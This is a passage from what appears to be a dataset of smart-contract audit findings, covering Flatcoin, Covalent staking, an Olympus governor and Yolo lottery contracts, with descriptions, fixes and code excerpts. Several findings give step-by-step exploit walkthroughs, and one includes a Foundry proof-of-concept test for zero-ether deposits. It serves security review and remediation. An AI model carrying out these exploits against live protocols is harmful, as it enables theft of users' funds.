FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n\\nWhen LPs deposit rETH and mint UNIT, the protocol will mint points to the depositor's account as per Line 84 below.\\nAssume that the vault has been newly deployed on-chain. Bob is the first LP to deposit rETH into the vault. Assume for a period of time (e.g., around 30 minutes), there are no other users depositing into the vault except for Bob.\\nBob could perform the following actions to mint points for free:\\nBob announces a deposit order to deposit 100e18 rETH. Paid for the keeper fee. (Acting as a LP).\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the deposit order and mints 100e18 UNIT (Exchange rate 1:1). Protocol also mints 100e18 points to Bob's account. Bob gets back the keeper fee. (Acting as Keeper)\\nImmediately after his `executeDeposit` TX, Bob inserts an ""announce withdraw order"" TX to withdraw all his 100e18 UNIT and pay for the keeper fee.\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the withdraw order and receives back his initial investment of 100e18 rETH. Since he is the only LP in the protocol, it is considered the final/last withdrawal, and he does not need to pay any withdraw fee. He also got back his keeper fee. (Acting as Keeper)\\nEach attack requires 20 seconds (10 + 10) to be executed. Bob could rinse and repeat the attack until he was no longer the only LP in the system, where he had to pay for the withdraw fee, which might make this attack unprofitable.\\nIf Bob is the only LP in the system for 30 minutes, he could gain 9000e18 points ((30 minutes / 20 seconds) * 100e18 ) for free as Bob could get back his keeper fee and does not incur any withdraw fee. The only thing that Bob needs to pay for is the gas fee, which is extremely cheap on L2 like Base.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n..SNIP..\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n..SNIP..\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n..SNIP..\\n // Mint points\\n IPointsModule pointsModule = IPointsModule(vault.moduleAddress(FlatcoinModuleKeys._POINTS_MODULE_KEY));\\n pointsModule.mintDeposit(_account, _announcedDeposit.depositAmount);\\n```\\n","One approach that could mitigate this risk is also to impose withdraw fee for the final/last withdrawal so that no one could abuse this exception to perform any attack that was once not profitable due to the need to pay withdraw fee.\\nIn addition, consider deducting the points once a position is closed or reduced in size so that no one can attempt to open and adjust/close a position repeatedly to obtain more points.","Large amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value from the protocol and create unfairness among other protocol users.","```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n" +Vault Inflation Attack,medium,"Malicious users can perform an inflation attack against the vault to steal the assets of the victim.\\nA malicious user can perform a donation to execute a classic first depositor/ERC4626 inflation Attack against the FlatCoin vault. The general process of this attack is well-known, and a detailed explanation of this attack can be found in many of the resources such as the following:\\nIn short, to kick-start the attack, the malicious user will often usually mint the smallest possible amount of shares (e.g., 1 wei) and then donate significant assets to the vault to inflate the number of assets per share. Subsequently, it will cause a rounding error when other users deposit.\\nHowever, in Flatcoin, there are various safeguards in place to mitigate this attack. Thus, one would need to perform additional steps to workaround/bypass the existing controls.\\nLet's divide the setup of the attack into two main parts:\\nMalicious user mint 1 mint of share\\nDonate or transfer assets to the vault to inflate the assets per share\\nPart 1 - Malicious user mint 1 mint of share\\nUsers could attempt to mint 1 wei of share. However, the validation check at Line 79 will revert as the share minted is less than `MIN_LIQUIDITY` = 10_000. However, this minimum liquidation requirement check can be bypassed.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n\\nFirst, Bob mints 10000 wei shares via `executeDeposit` function. Next, Bob withdraws 9999 wei shares via the `executeWithdraw`. In the end, Bob successfully owned only 1 wei share, which is the prerequisite for this attack.\\nPart 2 - Donate or transfer assets to the vault to inflate the assets per share\\nThe vault tracks the number of collateral within the state variables. Thus, simply transferring rETH collateral to the vault directly will not work, and the assets per share will remain the same.\\nTo work around this, Bob creates a large number of accounts (with different wallet addresses). He could choose any or both of the following methods to indirectly transfer collateral to the LP pool/vault to inflate the assets per share:\\nOpen a large number of leveraged long positions with the intention of incurring large amounts of losses. The long positions' losses are the gains of the LPs, and the collateral per share will increase.\\nOpen a large number of leveraged long positions till the max skew of 120%. Thus, this will cause the funding rate to increase, and the long will have to pay the LPs, which will also increase the collateral per share.\\nTriggering rounding error\\nThe `stableCollateralPerShare` will be inflated at this point. Following is the formula used to determine the number of shares minted to the depositor.\\nIf the `depositAmount` by the victim is not sufficiently large enough, the amount of shares minted to the depositor will round down to zero.\\n```\\n_collateralPerShare = (stableBalance * (10 ** decimals())) / totalSupply;\\n_liquidityMinted = (depositAmount * (10 ** decimals())) / _collateralPerShare\\n```\\n\\nFinally, the attacker withdraws their share from the pool. Since they are the only ones with any shares, this withdrawal equals the balance of the vault. This means the attacker also withdraws the tokens deposited by the victim earlier.","A `MIN_LIQUIDITY` amount of shares needs to exist within the vault to guard against a common inflation attack.\\nHowever, the current approach of only checking if the `totalSupply() < MIN_LIQUIDITY` is not sufficient, and could be bypassed by making use of the withdraw function.\\nA more robust approach to ensuring that there is always a minimum number of shares to guard against inflation attack is to mint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2).",Malicous users could steal the assets of the victim.,"```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n" +Long traders unable to withdraw their assets,medium,"Whenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, the protocol will be bricked. As a result, the margin deposited and gain of the long traders can no longer be withdrawn and the LPs cannot withdraw their collateral, leading to a loss of assets for the users.\\nPer Line 97 below, if the collateral balance is less than the tracked balance, the `_getCollateralNet` invariant check will revert.\\n```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation(""collateralNet"");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n\\nAssume that:\\nBob's long position: Margin = 50 ETH\\nAlice's LP: Deposited = 50 ETH\\nCollateral Balance = 100 ETH\\nTracked Balance = 100 ETH (Stable Collateral Total = 50 ETH, Margin Deposited Total = 50 ETH)\\nAssume that Bob's long position gains a profit of 51 ETH.\\nThe following actions will trigger the `updateGlobalPositionData` function internally: executeOpen, executeAdjust, executeClose, and liquidation.\\nWhen the `FlatcoinVault.updateGlobalPositionData` function is triggered to update the global position data:\\n```\\nprofitLossTotal = 51 ETH (gain by long)\\n\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 50 ETH + 0 + 51 ETH = 101 ETH\\n\\n_updateStableCollateralTotal(-51 ETH)\\nnewStableCollateralTotal = stableCollateralTotal + _stableCollateralAdjustment\\nnewStableCollateralTotal = 50 ETH + (-51 ETH) = -1 ETH\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0;\\nstableCollateralTotal = 0\\n```\\n\\nIn this case, the state becomes as follows:\\nCollateral Balance = 100 ETH\\nTracked Balance = 101 ETH (Stable Collateral Total = 0 ETH, Margin Deposited Total = 101 ETH)\\nNotice that the Collateral Balance and Tracked Balance are no longer in sync. As such, the revert will occur when the `_getCollateralNet` invariant checks are performed.\\nWhenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, this issue will occur, and the protocol will be bricked. The margin deposited and gain of the long traders can no longer be withdrawn from the protocol. The LPs also cannot withdraw their collateral.\\nThe reason is that the `_getCollateralNet` invariant checks are performed in all functions of the protocol that can be accessed by users (listed below):\\nDeposit\\nWithdraw\\nOpen Position\\nAdjust Position\\nClose Position\\nLiquidate","Currently, when the loss of the LP is more than the existing `stableCollateralTotal`, the loss will be capped at zero, and it will not go negative. In the above example, the `stableCollateralTotal` is 50, and the loss is 51. Thus, the `stableCollateralTotal` is set to zero instead of -1.\\nThe loss of LP and the gain of the trader should be aligned or symmetric. However, this is not the case in the current implementation. In the above example, the gain of traders is 51, while the loss of LP is 50, which results in a discrepancy here.\\nTo fix the issue, the loss of LP and the gain of the trader should be aligned. For instance, in the above example, if the loss of LP is capped at 50, then the profit of traders must also be capped at 50.\\nFollowing is a high-level logic of the fix:\\n```\\nIf (profitLossTotal > stableCollateralTotal): // (51 > 50) => True\\n profitLossTotal = stableCollateralTotal // profitLossTotal = 50\\n \\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal // 50 + 0 + 50 = 100\\n \\nnewStableCollateralTotal = stableCollateralTotal + (-profitLossTotal) // 50 + (-50) = 0\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0; // stableCollateralTotal = 0\\n```\\n\\nThe comment above verifies that the logic is working as intended.","Loss of assets for the users. Since the protocol is bricked due to revert, the long traders are unable to withdraw their deposited margin and gain and the LPs cannot withdraw their collateral.","```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation(""collateralNet"");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n" +Oracle can return different prices in same transaction,medium,"The Pyth network oracle contract allows to submit and read two different prices in the same transaction. This can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.\\n`OracleModule.sol` uses Pyth network as the primary source of price feeds. This oracle works in the following way:\\nA dedicated network keeps track of the latest price consensus, together with the timestamp.\\nThis data is queried off-chain and submitted to the on-chain oracle.\\nIt is checked that the data submitted is valid and the new price data is stored.\\nNew requests for the latest price will now return the data submitted until a more recent price is submitted.\\nOne thing to note is that the Pyth network is constantly updating the latest price (every 400ms), so when a new price is submitted on-chain it is not necessary that the price is the latest one. Otherwise, the process of querying the data off-chain, building the transaction, and submitting it on-chain would be required to be done with a latency of less than 400ms, which is not feasible. This makes it possible to submit two different prices in the same transaction and, thus, fetch two different prices in the same transaction.\\nThis can be used to create some arbitrage opportunities that can make a profit with no risk.\\nHow this can be exploited\\nAn example of how this can be exploited, and showed in the PoC, would be:\\nCreate a small leverage position.\\nAnnounce an adjustment order to increase the size of the position by some amount.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is higher than the first one.\\nExecute the adjustment order sending the first price.\\nExecute the limit close order sending the second price.\\nThe result is approximately a profit of\\n```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n\\nNote: For simplicity, we do not take into account the initial size of the position, which in any case can be insignificant compared to the adjustment size. The keeper fee is also not included, as is the owner of the position that is executing the orders.\\nThe following things are required to make a profit out of this attack:\\nSubmit the orders before other keepers. This can be easily achieved, as there are not always enough incentives to execute the orders as soon as possible.\\nObtain a positive delta between two prices in the time frame where the orders are executable that is greater than twice the trade fees. This can be very feasible, especially in moments of high volatility. Note also, that this requirement can be lowered to a delta greater than once the trade fees if we take into account that there is currently another vulnerability that allows to avoid paying fees for the limit order.\\nIn the case of not being able to obtain the required delta or observing that a keeper has already submitted a transaction to execute them before the delta is obtained, the user can simply cancel the limit order and will have just the adjustment order executed.\\nAnother possible strategy would pass through the following steps:\\nCreate a leverage position.\\nAnnounce another leverage position with the same size.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is lower than the first one.\\nExecute the limit close order sending the first price.\\nExecute the open order sending the second price.\\nThe result in this case is having a position with the same size as the original one, but having either lowered the `position.lastPrice` or getting a profit from the original position, depending on how the price has moved since the original position was opened.\\n\\n","```\\nFile: OracleModule.sol\\n FlatcoinStructs.OffchainOracle public offchainOracle; // Offchain Pyth network oracle\\n\\n// Add the line below\\n uint256 public lastOffchainUpdate;\\n\\n (// rest of code)\\n\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n// Add the line below\\n if (lastOffchainUpdate >= block.timestamp) return;\\n// Add the line below\\n lastOffchainUpdate = block.timestamp;\\n// Add the line below\\n\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n```\\n","Different oracle prices can be fetched in the same transaction, which can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.",```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n +OperationalStaking may not possess enough CQT for the last withdrawal,medium,"Both `_sharesToTokens` and `_tokensToShares` round down instead of rounding off against the user. This can result in users withdrawing few weis more than they should, which in turn would make the last CQT transfer from the contract revert due to insufficient balance.\\nWhen users `stake`, the shares they will receive is calculated via _tokensToShares:\\n```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n\\nSo the rounding will be against the user, or zero if the user provided the right amount of CQT.\\nWhen users unstake, their shares are decreased by\\n```\\n function _sharesToTokens(\\n uint128 sharesN,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(sharesN) * uint256(rate)) / DIVIDER);\\n }\\n```\\n\\nSo it is possible to `stake` and `unstake` such amounts, that would leave dust amount of shares on user's balance after their full withdrawal. However, dust amounts can not be withdrawn due to the check in _redeemRewards:\\n```\\n require(\\n effectiveAmount >= REWARD_REDEEM_THRESHOLD,\\n ""Requested amount must be higher than redeem threshold""\\n );\\n```\\n\\nBut, if the user does not withdraw immediately, but instead does it after the multiplier is increased, the dust he received from rounding error becomes withdrawable, because his `totalUnlockedValue` becomes greater than `REWARD_REDEEM_THRESHOLD`.\\nSo the user will end up withdrawing more than their `initialStake + shareOfRewards`, which means, if the rounding after all other operations stays net-zero for the protocol, there won't be enough CQT for the last CQT withdrawal (be it `transferUnstakedOut`, `redeemRewards`, or redeemCommission).\\nFoundry PoC","`_sharesToTokens` and `_tokensToShares`, instead of rounding down, should always round off against the user.",Victim's transactions will keep reverting unless they figure out that they need to decrease their withdrawal amount.,"```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n" +Frontrunning validator freeze to withdraw tokens,medium,"Covalent implements a freeze mechanism to disable malicious Validators, this allows the protocol to block all interactions with a validator when he behaves maliciously. Covalent also implements a timelock to ensure tokens are only withdraw after a certain amount of time. After the cooldown ends, tokens can always be withdrawn.\\nFollowing problem arise now: because the tokens can always be withdrawn, a malicious Validator can listen for a potential ""freeze"" transaction in the mempool, front run this transaction to unstake his tokens and withdraw them after the cooldown end.\\nAlmost every action on the Operational Staking contract checks if the validator is frozen or not:\\n```\\n require(!v.frozen, ""Validator is frozen"");\\n```\\n\\nThe methods transferUnstakedOut() and recoverUnstaking() are both not checking for this, making the unstake transaction front runnable. Here are the only checks of transferUnstakedOut():\\n```\\nrequire(validatorId < validatorsN, ""Invalid validator"");\\n require(_validators[validatorId].unstakings[msg.sender].length > unstakingId, ""Unstaking does not exist"");\\n Unstaking storage us = _validators[validatorId].unstakings[msg.sender][unstakingId];\\n require(us.amount >= amount, ""Unstaking has less tokens"");\\n```\\n\\nThis makes following attack possible:\\nValidator cheats and gets rewarded fees.\\nProtocol notices the misbehavior and initiates a Freeze transaction\\nValidator sees the transaction and starts a unstake() transaction with higher gas.\\nValidator gets frozen, but the unstaking is already done\\nValidator waits for cooldown and withdraws tokens.\\nNow the validator has gained unfairly obtained tokens and withdrawn his stake.","Implement a check if validator is frozen on `transferUnstakedOut()` and `recoverUnstaking()`, and revert transaction if true.\\nIf freezing all unstakings is undesirable (e.g. not freezing honest unstakes), the sponsor may consider storing the unstake timestamp as well:\\nStore the unstaking block number for each unstake.\\nFreeze the validator from a certain past block only, only unstakings that occur from that block onwards will get frozen.",Malicious validators can front run freeze to withdraw tokens.,"```\\n require(!v.frozen, ""Validator is frozen"");\\n```\\n" +`validatorMaxStake` can be bypassed by using `setValidatorAddress()`,medium,"`setValidatorAddress()` allows a validator to migrate to a new address of their choice. However, the current logic only stacks up the old address' stake to the new one, never checking `validatorMaxStake`.\\nThe current logic for `setValidatorAddress()` is as follow:\\n```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n\\nThe old address' stake is simply stacked on top of the new address' stake. There are no other checks for this amount, even though the new address may already have contained a stake.\\nThen the combined total of the two stakings may exceed `validatorMaxStake`. This accordingly allows the new (validator) staker's amount to bypass said threshold, breaking an important invariant of the protocol.\\nBob the validator has a self-stake equal to `validatorMaxStake`.\\nBob has another address, B2, with some stake delegated to Bob's validator.\\nBob migrates to B2.\\nBob's stake is stacked on top of B2. B2 becomes the new validator address, but their stake has exceeded `validatorMaxStake`.\\nB2 can then repeated this procedure to addresses B3, B4, ..., despite B2 already holding more than the max allowed amount.\\nBob now holds more stake than he should be able to, allowing him to earn an unfair amount of rewards compared to other validators.\\nWe also note that, even if the admin tries to freeze Bob, he can front-run the freeze with an unstake, since unstakes are not blocked from withdrawing (after cooldown ends).",Check that the new address's total stake does not exceed `validatorMaxStake` before proceeding with the migration.,"Breaking an important invariant of the protocol.\\nAllowing any validator to bypass the max stake amount. In turn allows them to earn an unfair amount of validator rewards in the process.\\nAllows a validator to unfairly increase their max delegator amount, as an effect of increasing `(validator stake) * maxCapMultiplier`.","```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n" +Nobody can cast for any proposal,medium,"```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n\\n```\\nfunction getPriorVotes(address account, uint256 blockNumber) external view returns (uint256) {\\n-> require(blockNumber < block.number, ""gOHM::getPriorVotes: not yet determined"");\\n// rest of code// rest of code\\n }\\n```\\n\\nTherefore, L446 will always revert. Voting will not be possible.\\nCopy the coded POC below to one project from Foundry and run `forge test -vvv` to prove this issue.","```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:- uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n446:+ uint256 currentVotes = gohm.getPriorVotes(voter, block.number - 1);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n```\\n\\n ",Nobody can cast for any proposal. Not being able to vote means the entire governance contract will be useless. Core functionality is broken.,"```\\nFile: bophades\\src\\external\\governance\\GovernorBravoDelegate.sol\\n function castVoteInternal(\\n address voter,\\n uint256 proposalId,\\n uint8 support\\n ) internal returns (uint256) {\\n// rest of code// rest of code\\n // Get the user's votes at the start of the proposal and at the time of voting. Take the minimum.\\n uint256 originalVotes = gohm.getPriorVotes(voter, proposal.startBlock);\\n446:-> uint256 currentVotes = gohm.getPriorVotes(voter, block.number);\\n uint256 votes = currentVotes > originalVotes ? originalVotes : currentVotes;\\n// rest of code// rest of code\\n }\\n```\\n" +User can get free entries if the price of any whitelisted ERC20 token is greater than the round's `valuePerEntry`,high,"Lack of explicit separation between ERC20 and ERC721 deposits allows users to gain free entries for any round given there exists a whitelisted ERC20 token with price greater than the round's `valuePerEntry`.\\n```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n\\n```\\n if (singleDeposit.tokenType == YoloV2__TokenType.ERC721) {\\n if (price == 0) {\\n price = _getReservoirPrice(singleDeposit);\\n prices[tokenAddress][roundId] = price;\\n }\\n```\\n\\n```\\n uint256 entriesCount = price / round.valuePerEntry;\\n if (entriesCount == 0) {\\n revert InvalidValue();\\n }\\n```\\n\\n```\\n } else if (tokenType == TokenType.ERC721) {\\n for (uint256 j; j < itemIdsLengthForSingleCollection; ) {\\n // rest of code\\n _executeERC721TransferFrom(items[i].tokenAddress, from, to, itemIds[j]);\\n```\\n\\n```\\n function _executeERC721TransferFrom(address collection, address from, address to, uint256 tokenId) internal {\\n // rest of code\\n (bool status, ) = collection.call(abi.encodeCall(IERC721.transferFrom, (from, to, tokenId)));\\n // rest of code\\n }\\n```\\n\\nThe function signature of `transferFrom` for ERC721 and ERC20 is identical, so this will call `transferFrom` on the ERC20 contract with `amount = 0` (since 'token ids' specified in `singleDeposit.tokenIdsOrAmounts` are all 0). Consequently, the user pays nothing and the transaction executes successfully (as long as the ERC20 token does not revert on zero transfers).\\nPaste the test below into `Yolo.deposit.t.sol` with `forge-std/console.sol` imported. It demonstrates a user making 3 free deposits (in the same transaction) using the MKR token (ie. with zero MKR balance). The token used can be substituted with any token with price > `valuePerEntry = 0.01 ETH` (which is non-rebasing/non-taxable and has sufficient liquidity in their /ETH Uniswap v3 pool as specified in the README).\\n",Whitelist tokens using both the token address and the token type (ERC20/ERC721).,"Users can get an arbitrary number of entries into rounds for free (which should generally allow them to significantly increase their chances of winning). In the case the winner is a free depositor, they will end up with the same profit as if they participated normally since they have to pay the fee over the total value of the deposits (which includes the price of their free deposits). If the winner is an honest depositor, they still have to pay the full fee including the free entries, but they are unable to claim the value for the free entries (since the `tokenId` (or amount) is zero). They earn less profit than if everyone had participated honestly.",```\\n if (isCurrencyAllowed[tokenAddress] != 1) {\\n revert InvalidCollection();\\n }\\n```\\n +"Users can deposit ""0"" ether to any round",high,"The main invariant to determine the winner is that the indexes must be in ascending order with no repetitions. Therefore, depositing ""0"" is strictly prohibited as it does not increase the index. However, there is a method by which a user can easily deposit ""0"" ether to any round without any extra costs than gas.\\nAs stated in the summary, depositing ""0"" will not increment the entryIndex, leading to a potential issue with the indexes array. This, in turn, may result in an unfair winner selection due to how the upper bound is determined in the array. The relevant code snippet illustrating this behavior is found here.\\nLet's check the following code snippet in the `depositETHIntoMultipleRounds` function\\n```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be ""0""\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with ""0"" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n\\nas we can see in the above comments added by me starting with ""review"" it explains how its possible. As long as user deposits normally to 1 round then he can also deposit ""0"" amounts to any round because the `expectedValue` will be equal to msg.value.\\nTextual PoC: Assume Alice sends the tx with 1 ether as msg.value and ""amounts"" array as [1 ether, 0, 0]. first time the loop starts the 1 ether will be correctly evaluated in to the round. When the loop starts the 2nd and 3rd iterations it won't revert because the following code snippet will be ""0"" and adding 0 to `expectedValue` will not increment to `expectedValue` so the msg.value will be exactly same with the `expectedValue`.\\n```\\nif (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n```\\n\\nCoded PoC (copy the test to `Yolo.deposit.sol` file and run the test):\\n```\\nfunction test_deposit0ToRounds() external {\\n vm.deal(user2, 1 ether);\\n vm.deal(user3, 1 ether);\\n\\n // @dev first round starts normally\\n vm.prank(user2);\\n yolo.deposit{value: 1 ether}(1, _emptyDepositsCalldata());\\n\\n // @dev user3 will deposit 1 ether to the current round(1) and will deposit\\n // 0,0 to round 2 and round3\\n uint256[] memory amounts = new uint256[](3);\\n amounts[0] = 1 ether;\\n amounts[1] = 0;\\n amounts[2] = 0;\\n vm.prank(user3);\\n yolo.depositETHIntoMultipleRounds{value: 1 ether}(amounts);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round2\\n IYoloV2.Deposit[] memory deposits = _getDeposits(2);\\n assertEq(deposits.length, 1);\\n IYoloV2.Deposit memory deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n\\n // @dev check user3 indeed managed to deposit 0 ether to round3\\n deposits = _getDeposits(3);\\n assertEq(deposits.length, 1);\\n deposit = deposits[0];\\n assertEq(uint8(deposit.tokenType), uint8(IYoloV2.YoloV2__TokenType.ETH));\\n assertEq(deposit.tokenAddress, address(0));\\n assertEq(deposit.tokenId, 0);\\n assertEq(deposit.tokenAmount, 0);\\n assertEq(deposit.depositor, user3);\\n assertFalse(deposit.withdrawn);\\n assertEq(deposit.currentEntryIndex, 0);\\n }\\n```\\n",Add the following check inside the 